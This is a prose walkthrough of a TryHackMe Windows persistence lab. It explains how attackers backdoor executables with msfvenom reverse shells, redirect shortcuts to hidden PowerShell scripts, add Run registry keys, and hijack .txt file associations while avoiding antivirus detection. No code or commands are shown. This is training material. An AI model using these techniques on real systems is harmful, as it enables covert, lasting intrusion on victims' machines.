Introduction
In this post, we covered the second part of Windows Persistence Techniques and specifically we covered Backdooring files as part of TryHackMe Windows Local Persistence
Another method of establishing persistence consists of tampering with some files we know the user interacts with regularly. By performing some modifications to such files, we can plant backdoors that will get executed whenever the user accesses them. Since we don’t want to create any alerts that could blow our cover, the files we alter must keep working for the user as expected.
While there are many opportunities to plant backdoors, we will check the most commonly used ones.
- Executable Files
- Shortcut Files
- Hijacking File Associations
- Startup Scripts
Method 1: Packing Executables with Payloads
Attackers often try to sneak past defenses by hiding malicious code inside everyday programs. One way they do this is by using tools like msfvenom to wrap a reverse shell inside a common executable—something like calc.exe. When the file runs, it opens the Calculator like usual, so everything looks normal on the surface. But behind the scenes, it’s also reaching out to the attacker’s system, quietly opening up a connection.
To avoid getting caught by antivirus software, they try tricks like encoding the payload or running it through several layers of obfuscation. They use flags like -e to encode and -i to add multiple iterations of encoding. The goal is to make the malicious part of the file harder for antivirus tools to recognize.
Even with these techniques, it’s a hit-or-miss game. When tested on VirusTotal—a site that checks files against dozens of antivirus engines—these packed executables often still get flagged. Detection rates remain high unless the attacker uses more advanced methods or adds other tools to hide the code better.
So, while this method gets the job done in basic setups or against outdated defenses, it doesn’t hold up well against modern security layers without serious tweaks. It’s noisy and risky—fine for a quick test or amateur attack, but not ideal if stealth is a priority.
Method 2: Shortcut Hijacking
Shortcut files—those .lnk files you see on your desktop or start menu—don’t get much attention. But that’s exactly why attackers love them. They’re small, familiar, and easy to tweak.
Instead of linking straight to a trusted app like Word or Chrome, an attacker changes the shortcut’s target. Now it points to a PowerShell script. That script runs two things at once: the real application you expect and a hidden backdoor. So when you click the shortcut, everything seems normal—the app opens, nothing looks off—but in the background, your machine is reaching out to an attacker-controlled server.
No error messages. No weird popups. Just a quiet connection and an open door.
It’s simple and sneaky. The setup doesn’t need deep skills or fancy tools, and it blends right in with everyday use. Plus, because users rarely look twice at shortcuts, this method often flies under the radar. It’s a low-effort way for attackers to stay in the system without setting off alarms.
Method 3: Startup Folder Exploits
One of the fastest ways to make sure a script runs every time a machine boots up? Tweak the Windows registry.
Attackers often go straight for the HKLM\Software\Microsoft\Windows\CurrentVersion\Run key. By adding a new entry there, they can point Windows to any script or program they want. When the system restarts, Windows checks this part of the registry and automatically runs whatever’s listed.
This trick is simple but powerful. It doesn’t take a lot of skill to pull off, and it’s especially useful for script-based payloads—like PowerShell or batch files. Once in place, the script fires up with every reboot, keeping the attacker connected or the malicious behavior running, without needing to re-infect the system.
Because it’s built into how Windows handles startup programs, this method often goes unnoticed unless someone’s actively monitoring registry changes. That makes it a favorite move for malware that wants to stick around quietly and reliably.
Method 4: File Association Hijacking
One of the sneakiest ways attackers hold onto access is by messing with how Windows opens files. They don’t go after the files themselves—they target the rules Windows uses to decide how to open them.
It works like this: The attacker changes a registry setting tied to a common file extension—something harmless, like .txt. Normally, double-clicking a .txt file launches Notepad. But with this trick, the file still opens in Notepad after something else happens first.
Behind the scenes, the default program for that file type has been switched. Now, when a user opens a text file, a script runs instead. That script quietly executes a backdoor, then opens the file in Notepad just like usual. No error messages, no delays—just business as usual from the user’s point of view.
Because this relies on regular activity—something as simple as opening a text file—it’s almost invisible. There’s no shortcut to inspect, no strange pop-up. It blends right in with how people use their machines every day, which is exactly what makes it so effective.
Practical Demos and Flag Extraction
All these methods aren’t just theory—they’re played out step-by-step on a TryHackMe virtual machine. The attacker walks through each one live, showing exactly how the backdoors are placed, triggered, and confirmed. The goal? Grab the flags that prove the system’s been compromised.
But it’s not just about getting in. There’s a focus on stealth too. Every time a payload runs, it’s tested not only to see if it works but also to check how it affects the system’s behavior. If anything looks off or interrupts the usual flow for the user, that method gets adjusted or scrapped. The idea is to keep things looking normal while the attack unfolds quietly in the background.
They also pay close attention to how antivirus tools respond. Some payloads get flagged immediately, while others slip through. This helps the attacker tweak things—like adding obfuscation or changing the delivery method—to avoid detection.
The overall approach is methodical. Each backdoor gets validated, not just technically, but in how well it hides. It’s about staying in without setting off alarms.
TryHackMe Windows Local Persistence Room Answers
Insert flag5 here
Insert flag6 here
